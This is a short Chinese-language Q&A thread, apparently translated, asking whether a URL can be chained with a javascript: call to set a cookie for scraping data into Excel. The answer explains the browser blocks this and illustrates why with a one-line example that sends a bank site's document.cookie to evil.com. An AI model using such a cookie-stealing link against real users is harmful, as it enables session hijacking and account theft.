我需要访问某人网站上的某些数据。访问该页面的方法是访问http://www.foosite.com
,然后点击包含javascript:foo();
的链接以显示真实数据。
foo()就像:
function foo(param){
createXXXCookie('COOKIE_NAME', param, 60);
window.location.href="/current/location";
}
所以这基本上是设置cookie并重新加载页面。在页面加载期间,文档准备好读取COOKIE_NAME并显示相应的数据。
我想使用MS Excel从此页面获取一些数据。所以我一直在寻找一种获取数据的方法。因为在浏览器地址栏中,我可以先输入http://www.foosite.com
,然后输入javascript:foo();
来调用foo()。我想知道组合URL和书签,如http://www.foosite.com;javascript:foo();
是否可行?我实际上尝试了这一点,但似乎IE / FF / GC将跳过javascript:...部分并且只是继续URL的第一部分。
答案 0 :(得分:1)
这是不可能的。
如果有可能,那将是一个致命的安全漏洞。
通过电子邮件向某人发送http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie))
的短链接,然后从那里继续发送到自动提交表单。